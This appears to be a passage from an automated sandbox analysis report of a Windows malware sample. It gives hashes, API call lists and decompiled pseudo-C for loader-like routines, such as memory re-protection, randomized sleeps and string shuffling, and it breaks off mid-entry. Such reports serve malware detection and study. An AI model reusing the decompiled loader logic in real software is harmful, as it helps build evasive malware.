                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                • String ID:
                • API String ID: 1825273115-0
                • Opcode ID: b263e61150fcdb553f5c8d4fb2c6ffb4fc2c048576a143663bfea8d860e9137e
                • Instruction ID: 7d837f4a86b7da5d5033bd3345513513dd1177c095b8f8b3d24d096cbf63f870
                • Opcode Fuzzy Hash: b263e61150fcdb553f5c8d4fb2c6ffb4fc2c048576a143663bfea8d860e9137e
                • Instruction Fuzzy Hash: 0551C771E60236FBDB20AFE4ED58FAE33A8AB04704F115A15E901EB148D7B7995C8F50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E02227040(signed int __eax, signed int _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				signed int _v20;
                				intOrPtr _t81;
                				char _t83;
                				signed int _t90;
                				signed int _t97;
                				signed int _t99;
                				char _t101;
                				unsigned int _t102;
                				intOrPtr _t103;
                				char* _t107;
                				signed int _t110;
                				signed int _t113;
                				signed int _t118;
                				signed int _t122;
                				intOrPtr _t124;
                
                				_t102 = _a8;
                				_t118 = 0;
                				_v20 = __eax;
                				_t122 = (_t102 >> 2) + 1;
                				_v8 = 0;
                				_a8 = 0;
                				_t81 = E022233DC(_t122 << 2);
                				_v16 = _t81;
                				if(_t81 == 0) {
                					_push(8);
                					_pop(0);
                					L37:
                					return 0;
                				}
                				_t107 = _a4;
                				_a4 = _t102;
                				_t113 = 0;
                				while(1) {
                					_t83 =  *_t107;
                					if(_t83 == 0) {
                						break;
                					}
                					if(_t83 == 0xd || _t83 == 0xa) {
                						if(_t118 != 0) {
                							if(_t118 > _v8) {
                								_v8 = _t118;
                							}
                							_a8 = _a8 + 1;
                							_t118 = 0;
                						}
                						 *_t107 = 0;
                						goto L16;
                					} else {
                						if(_t118 != 0) {
                							L10:
                							_t118 = _t118 + 1;
                							L16:
                							_t107 = _t107 + 1;
                							_t15 =  &_a4;
                							 *_t15 = _a4 - 1;
                							if( *_t15 != 0) {
                								continue;
                							}
                							break;
                						}
                						if(_t113 == _t122) {
                							L21:
                							if(_a8 <= 0x20) {
                								_push(0xb);
                								L34:
                								_pop(0);
                								L35:
                								E022261DA(_v16);
                								goto L37;
                							}
                							_t24 = _v8 + 5; // 0xcdd8d2f8
                							_t103 = E022233DC((_v8 + _t24) * _a8 + 4);
                							if(_t103 == 0) {
                								_push(8);
                								goto L34;
                							}
                							_t90 = _a8;
                							_a4 = _a4 & 0x00000000;
                							_v8 = _v8 & 0x00000000;
                							_t124 = _t103 + _t90 * 4;
                							if(_t90 <= 0) {
                								L31:
                								 *0x222a318 = _t103;
                								goto L35;
                							}
                							do {
                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                								_v12 = _v12 & 0x00000000;
                								if(_a4 <= 0) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t99 = _v12;
                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                									if(_t99 == 0) {
                										break;
                									}
                									_v12 = _v12 + 1;
                									if(_v12 < _a4) {
                										continue;
                									}
                									goto L30;
                								}
                								_v8 = _v8 - 1;
                								L30:
                								_t97 = _a4;
                								_a4 = _a4 + 1;
                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                								__imp__(_t124);
                								_v8 = _v8 + 1;
                								_t124 = _t124 + _t97 + 1;
                							} while (_v8 < _a8);
                							goto L31;
                						}
                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                						_t101 = _t83;
                						if(_t83 - 0x61 <= 0x19) {
                							_t101 = _t101 - 0x20;
                						}
                						 *_t107 = _t101;
                						_t113 = _t113 + 1;
                						goto L10;
                					}
                				}
                				if(_t118 != 0) {
                					if(_t118 > _v8) {
                						_v8 = _t118;
                					}
                					_a8 = _a8 + 1;
                				}
                				goto L21;
                			}





















                0x02227047
                0x0222704e
                0x02227053
                0x02227056
                0x0222705d
                0x02227060
                0x02227063
                0x02227068
                0x0222706d
                0x022271c1
                0x022271c3
                0x022271c5
                0x022271ca
                0x022271ca
                0x02227073
                0x02227076
                0x02227079
                0x0222707b
                0x0222707b
                0x0222707f
                0x00000000
                0x00000000
                0x02227083
                0x022270af
                0x022270b4
                0x022270b6
                0x022270b6
                0x022270b9
                0x022270bc
                0x022270bc
                0x022270be
                0x00000000
                0x02227089
                0x0222708b
                0x022270aa
                0x022270aa
                0x022270c1
                0x022270c1
                0x022270c2
                0x022270c2
                0x022270c5
                0x00000000
                0x00000000
                0x00000000
                0x022270c5
                0x0222708f
                0x022270d6
                0x022270da
                0x022271b4
                0x022271b6
                0x022271b6
                0x022271b7
                0x022271ba
                0x00000000
                0x022271ba
                0x022270e3
                0x022270f4
                0x022270f8
                0x022271b0
                0x00000000
                0x022271b0
                0x022270fe
                0x02227101
                0x02227105
                0x02227109
                0x0222710e
                0x022271a6
                0x022271a6
                0x00000000
                0x022271ac
                0x02227119
                0x02227122
                0x02227136
                0x0222713d
                0x02227152
                0x02227158
                0x02227160
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x02227162
                0x02227162
                0x02227162
                0x02227169
                0x02227171
                0x00000000
                0x00000000
                0x02227173
                0x0222717c
                0x00000000
                0x00000000
                0x00000000
                0x0222717e
                0x02227180
                0x02227183
                0x02227183
                0x02227186
                0x0222718a
                0x0222718d
                0x02227193
                0x02227196
                0x0222719d
                0x00000000
                0x02227119
                0x02227094
                0x0222709c
                0x022270a2
                0x022270a4
                0x022270a4
                0x022270a7
                0x022270a9
                0x00000000
                0x022270a9
                0x02227083
                0x022270c9
                0x022270ce
                0x022270d0
                0x022270d0
                0x022270d3
                0x022270d3
                0x00000000

                APIs
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • lstrcpy.KERNEL32(43175AC4,00000020), ref: 0222713D
                • lstrcat.KERNEL32(43175AC4,00000020), ref: 02227152
                • lstrcmp.KERNEL32(00000000,43175AC4), ref: 02227169
                • lstrlen.KERNEL32(43175AC4), ref: 0222718D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 222d111b1f2c83bee0bb33b50ee0856ec4a4935c70f974f0e0789e965325d99f
                • Instruction ID: 2f155e330595300a42eeb80060213698d8b6fcd5d8899e0e2c87088becd83e19
                • Opcode Fuzzy Hash: 222d111b1f2c83bee0bb33b50ee0856ec4a4935c70f974f0e0789e965325d99f
                • Instruction Fuzzy Hash: C451D171A14229FBDF20CFD9C4846ADFBB6FF41304F15805AE8149B219C772AB59CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			_entry_() {
                				void* _t1;
                				int _t4;
                				int _t6;
                
                				_t6 = 0;
                				_t1 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x404160 = _t1;
                				if(_t1 != 0) {
                					 *0x404170 = GetModuleHandleA(0);
                					GetCommandLineW(); // executed
                					_t4 = E004019F1(); // executed
                					_t6 = _t4;
                					HeapDestroy( *0x404160);
                				}
                				ExitProcess(_t6);
                			}






                0x00401de2
                0x00401deb
                0x00401df1
                0x00401df8
                0x00401e01
                0x00401e06
                0x00401e0c
                0x00401e17
                0x00401e19
                0x00401e19
                0x00401e20

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
                • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                • GetCommandLineW.KERNEL32 ref: 00401E06
                  • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                  • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                  • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                  • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                  • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                  • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                  • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                • HeapDestroy.KERNEL32 ref: 00401E19
                • ExitProcess.KERNEL32 ref: 00401E20
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                • String ID:
                • API String ID: 1863574965-0
                • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0050024D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID: cess$kernel32.dll
                • API String ID: 4275171209-1230238691
                • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                • Instruction ID: b4564d959a36bf7a2559786a77b310a39ab62a0683976f7b6e2d52c39442a703
                • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                • Instruction Fuzzy Hash: 8DC19BB5D01229EFDF60CFA8D985BDDBBB5BF08304F108099E548A7292DB319A94DF11
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 022243B5
                • SysAllocString.OLEAUT32(02224D42), ref: 022243F9
                • SysFreeString.OLEAUT32(00000000), ref: 0222440D
                • SysFreeString.OLEAUT32(00000000), ref: 0222441B
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: d26dad274545c093d5c79ec991d6136c402caeeba3052225ec2215cc34ca0d46
                • Instruction ID: c53d8b286489c18ceb4d51a0ce8860280d5d6b88a144f36e6f0e562463e55913
                • Opcode Fuzzy Hash: d26dad274545c093d5c79ec991d6136c402caeeba3052225ec2215cc34ca0d46
                • Instruction Fuzzy Hash: E5314D71910209FFCB15DFD8D4C49AE7BB9FF08304B21842EF906AB250D7729689CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E0222213E(void* __ecx, intOrPtr _a4) {
                				struct _FILETIME _v12;
                				int _t13;
                				signed int _t16;
                				void* _t17;
                				signed int _t18;
                				unsigned int _t22;
                				void* _t30;
                				signed int _t34;
                
                				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                				asm("stosd");
                				do {
                					_t13 = SwitchToThread();
                					GetSystemTimeAsFileTime( &_v12);
                					_t22 = _v12.dwHighDateTime;
                					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                					_push(0);
                					_push(0x13);
                					_push(_t22 >> 5);
                					_push(_t16);
                					L02228436();
                					_t34 = _t16 + _t13;
                					_t17 = E02226269(_a4, _t34);
                					_t30 = _t17;
                					_t18 = 3;
                					Sleep(_t18 << (_t34 & 0x00000007)); // executed
                				} while (_t30 == 1);
                				return _t30;
                			}











                0x02222143
                0x0222214e
                0x0222214f
                0x0222214f
                0x0222215b
                0x02222164
                0x02222167
                0x0222216b
                0x0222216d
                0x02222172
                0x02222173
                0x02222174
                0x0222217e
                0x02222181
                0x02222188
                0x0222218c
                0x02222193
                0x02222199
                0x022221a3

                APIs
                • SwitchToThread.KERNEL32(?,00000001,?,?,?,02225044,?,?), ref: 0222214F
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02225044,?,?), ref: 0222215B
                • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02222174
                  • Part of subcall function 02226269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02226308
                • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,02225044,?,?), ref: 02222193
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                • String ID:
                • API String ID: 1610602887-0
                • Opcode ID: 35253a2162a03fec02c16d171c5a9cc2094ca628d710dd03c745cc370eaf0fed
                • Instruction ID: 672af5fcef6ec0f14b138a6b9b46c9b432ffccd98f1a6d323a7647138b6a9b0e
                • Opcode Fuzzy Hash: 35253a2162a03fec02c16d171c5a9cc2094ca628d710dd03c745cc370eaf0fed
                • Instruction Fuzzy Hash: C4F0F477F502187BD7149AE0DC0DFEF76B9DB80360F110524E601E7340EAB59A44CAA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E02225364(void** __esi) {
                				intOrPtr _v0;
                				intOrPtr _t4;
                				intOrPtr _t6;
                				void* _t8;
                				void* _t9;
                				intOrPtr _t10;
                				void* _t11;
                				void** _t13;
                
                				_t13 = __esi;
                				_t4 =  *0x222a3cc; // 0x2bd9600
                				__imp__(_t4 + 0x40);
                				while(1) {
                					_t6 =  *0x222a3cc; // 0x2bd9600
                					_t1 = _t6 + 0x58; // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t8 =  *_t13;
                				if(_t8 != 0 && _t8 != 0x222a030) {
                					HeapFree( *0x222a2d8, 0, _t8);
                				}
                				_t9 = E022212C6(_v0, _t13); // executed
                				_t13[1] = _t9;
                				_t10 =  *0x222a3cc; // 0x2bd9600
                				_t11 = _t10 + 0x40;
                				__imp__(_t11);
                				return _t11;
                			}











                0x02225364
                0x02225364
                0x0222536d
                0x0222537d
                0x0222537d
                0x02225382
                0x02225387
                0x00000000
                0x00000000
                0x02225377
                0x02225377
                0x02225389
                0x0222538d
                0x0222539f
                0x0222539f
                0x022253aa
                0x022253af
                0x022253b2
                0x022253b7
                0x022253bb
                0x022253c1

                APIs
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 0222536D
                • Sleep.KERNEL32(0000000A), ref: 02225377
                • HeapFree.KERNEL32(00000000,00000000), ref: 0222539F
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 022253BB
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: a9a2e0ec10755a5b0456770cf4e8952d5120066252025768bdcf13c5da3263b3
                • Instruction ID: f272b38ecdb980ab2de24ffd045df37ef8df21efe8286e9171e295dc1fb616ee
                • Opcode Fuzzy Hash: a9a2e0ec10755a5b0456770cf4e8952d5120066252025768bdcf13c5da3263b3
                • Instruction Fuzzy Hash: 2BF03A31A50212BBEB349BE4EE4CF163BA5AB04340B12A800B505CA665C763D8BCCA14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02225251(void* __edx) {
                				void* _v8;
                				int _v12;
                				WCHAR* _v16;
                				void* __edi;
                				void* __esi;
                				void* _t23;
                				intOrPtr _t24;
                				void* _t26;
                				intOrPtr _t32;
                				intOrPtr _t35;
                				intOrPtr _t38;
                				intOrPtr _t42;
                				void* _t45;
                				void* _t50;
                				void* _t52;
                
                				_t50 = __edx;
                				_v12 = 0;
                				_t23 = E02226ADC(0,  &_v8); // executed
                				if(_t23 != 0) {
                					_v8 = 0;
                				}
                				_t24 =  *0x222a348; // 0x9ad5a8
                				_t4 = _t24 + 0x222bc70; // 0x2bd9218
                				_t5 = _t24 + 0x222bb60; // 0x4f0053
                				_t26 = E022233F1( &_v16, _v8, _t5, _t4); // executed
                				_t45 = _t26;
                				if(_t45 == 0) {
                					StrToIntExW(_v16, 0,  &_v12);
                					_t45 = 8;
                					if(_v12 < _t45) {
                						_t45 = 1;
                						__eflags = 1;
                					} else {
                						_t32 =  *0x222a348; // 0x9ad5a8
                						_t11 = _t32 + 0x222bcc8; // 0x2bd9270
                						_t48 = _t11;
                						_t12 = _t32 + 0x222bb60; // 0x4f0053
                						_t52 = E02225DE4(_t11, _t12, _t11);
                						_t59 = _t52;
                						if(_t52 != 0) {
                							_t35 =  *0x222a348; // 0x9ad5a8
                							_t13 = _t35 + 0x222bcf0; // 0x30314549
                							if(E02225157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                								_t61 =  *0x222a2fc - 6;
                								if( *0x222a2fc <= 6) {
                									_t42 =  *0x222a348; // 0x9ad5a8
                									_t15 = _t42 + 0x222bcd2; // 0x52384549
                									E02225157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                								}
                							}
                							_t38 =  *0x222a348; // 0x9ad5a8
                							_t17 = _t38 + 0x222bbb8; // 0x2bd9160
                							_t18 = _t38 + 0x222bc1c; // 0x680043
                							_t45 = E02225B0E(_v8, 0x80000001, _t52, _t18, _t17);
                							HeapFree( *0x222a2d8, 0, _t52);
                						}
                					}
                					HeapFree( *0x222a2d8, 0, _v16);
                				}
                				_t54 = _v8;
                				if(_v8 != 0) {
                					E02227220(_t54);
                				}
                				return _t45;
                			}


















                0x02225251
                0x02225261
                0x02225264
                0x0222526b
                0x0222526d
                0x0222526d
                0x02225270
                0x02225275
                0x0222527c
                0x02225289
                0x0222528e
                0x02225292
                0x022252a0
                0x022252ae
                0x022252b2
                0x02225343
                0x02225343
                0x022252b8
                0x022252b8
                0x022252bd
                0x022252bd
                0x022252c4
                0x022252d0
                0x022252d2
                0x022252d4
                0x022252d6
                0x022252dd
                0x022252ef
                0x022252f1
                0x022252f8
                0x022252fa
                0x02225301
                0x0222530c
                0x0222530c
                0x022252f8
                0x02225311
                0x02225316
                0x0222531d
                0x0222533b
                0x0222533d
                0x0222533d
                0x022252d4
                0x0222534f
                0x0222534f
                0x02225351
                0x02225356
                0x02225358
                0x02225358
                0x02225363

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BD9218,00000000,?,74D0F710,00000000,74D0F730), ref: 022252A0
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BD9160,?,00000000,30314549,00000014,004F0053,02BD9270), ref: 0222533D
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022268B6), ref: 0222534F
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 5f27a1771ac4c582ef4f1cc1e9e27e99c3afb3859dad3f60cacafa8f6a961b0b
                • Instruction ID: b52cb1174a838df3bdff33923c2c25cc6485301b1050b250810fdc5f3c20c563
                • Opcode Fuzzy Hash: 5f27a1771ac4c582ef4f1cc1e9e27e99c3afb3859dad3f60cacafa8f6a961b0b
                • Instruction Fuzzy Hash: 3931A131910229BFDB20DBD0ED88E9E7BBDEB04704F565055F5009B124DBB39A6CDB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E004014CF(void* __eax, void* _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				long _v20;
                				int _t42;
                				long _t53;
                				intOrPtr _t56;
                				void* _t57;
                				signed int _t59;
                
                				_v12 = _v12 & 0x00000000;
                				_t56 =  *0x404180;
                				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                				_v16 =  *(__eax + 6) & 0x0000ffff;
                				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
                				_v8 = _v8 & 0x00000000;
                				if(_v16 <= 0) {
                					L12:
                					return _v12;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t59 = _v12;
                					if(_t59 != 0) {
                						goto L12;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t59 >= 0) {
                						asm("bt [esi+0x24], eax");
                						if(__eflags >= 0) {
                							L8:
                							_t53 = _t56 - 0x43175abf;
                							L9:
                							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
                							if(_t42 == 0) {
                								_v12 = GetLastError();
                							}
                							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
                							_v8 = _v8 + 1;
                							if(_v8 < _v16) {
                								continue;
                							} else {
                								goto L12;
                							}
                						}
                						asm("bt [esi+0x24], eax");
                						_t53 = _t56 - 0x43175ac1;
                						if(__eflags >= 0) {
                							goto L9;
                						}
                						goto L8;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t59 >= 0) {
                						_t53 = _t56 - 0x43175aa3;
                					} else {
                						_t53 = _t56 - 0x43175a83;
                					}
                					goto L9;
                				}
                				goto L12;
                			}












                0x004014d9
                0x004014e6
                0x004014ec
                0x004014f8
                0x00401508
                0x0040150a
                0x00401512
                0x004015a6
                0x004015ad
                0x00000000
                0x00000000
                0x00000000
                0x00401518
                0x00401518
                0x00401518
                0x0040151c
                0x00000000
                0x00000000
                0x00401528
                0x0040152c
                0x00401550
                0x00401554
                0x00401568
                0x00401568
                0x0040156e
                0x0040157d
                0x00401581
                0x00401589
                0x00401589
                0x00401595
                0x00401597
                0x004015a0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004015a0
                0x0040155c
                0x00401560
                0x00401566
                0x00000000
                0x00000000
                0x00000000
                0x00401566
                0x00401534
                0x00401538
                0x00401542
                0x0040153a
                0x0040153a
                0x0040153a
                0x00000000
                0x00401538
                0x00000000

                APIs
                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                • GetLastError.KERNEL32 ref: 00401583
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLast
                • String ID:
                • API String ID: 1469625949-0
                • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			E022212C6(char* _a4, char** _a8) {
                				char* _t7;
                				char* _t11;
                				char* _t14;
                				char* _t16;
                				char* _t17;
                				char _t18;
                				signed int _t20;
                				signed int _t22;
                
                				_t16 = _a4;
                				_push(0x20);
                				_t20 = 1;
                				_push(_t16);
                				while(1) {
                					_t7 = StrChrA();
                					if(_t7 == 0) {
                						break;
                					}
                					_t20 = _t20 + 1;
                					_push(0x20);
                					_push( &(_t7[1]));
                				}
                				_t11 = E022233DC(_t20 << 2);
                				_a4 = _t11;
                				if(_t11 != 0) {
                					StrTrimA(_t16, 0x2229278); // executed
                					_t22 = 0;
                					do {
                						_t14 = StrChrA(_t16, 0x20);
                						if(_t14 != 0) {
                							 *_t14 = 0;
                							do {
                								_t14 =  &(_t14[1]);
                								_t18 =  *_t14;
                							} while (_t18 == 0x20 || _t18 == 9);
                						}
                						_t17 = _a4;
                						 *(_t17 + _t22 * 4) = _t16;
                						_t22 = _t22 + 1;
                						_t16 = _t14;
                					} while (_t14 != 0);
                					 *_a8 = _t17;
                				}
                				return 0;
                			}











                0x022212ca
                0x022212d7
                0x022212d9
                0x022212da
                0x022212e2
                0x022212e2
                0x022212e6
                0x00000000
                0x00000000
                0x022212dd
                0x022212de
                0x022212e1
                0x022212e1
                0x022212ee
                0x022212f3
                0x022212f8
                0x02221300
                0x02221306
                0x02221308
                0x0222130b
                0x0222130f
                0x02221311
                0x02221314
                0x02221314
                0x02221315
                0x02221317
                0x02221314
                0x02221321
                0x02221324
                0x02221327
                0x02221328
                0x0222132a
                0x02221331
                0x02221331
                0x0222133d

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,02BD95FC,?,?,022253AF,?,02BD95FC), ref: 022212E2
                • StrTrimA.KERNELBASE(?,02229278,00000002,?,022253AF,?,02BD95FC), ref: 02221300
                • StrChrA.SHLWAPI(?,00000020,?,022253AF,?,02BD95FC), ref: 0222130B
                Memory Dump Source
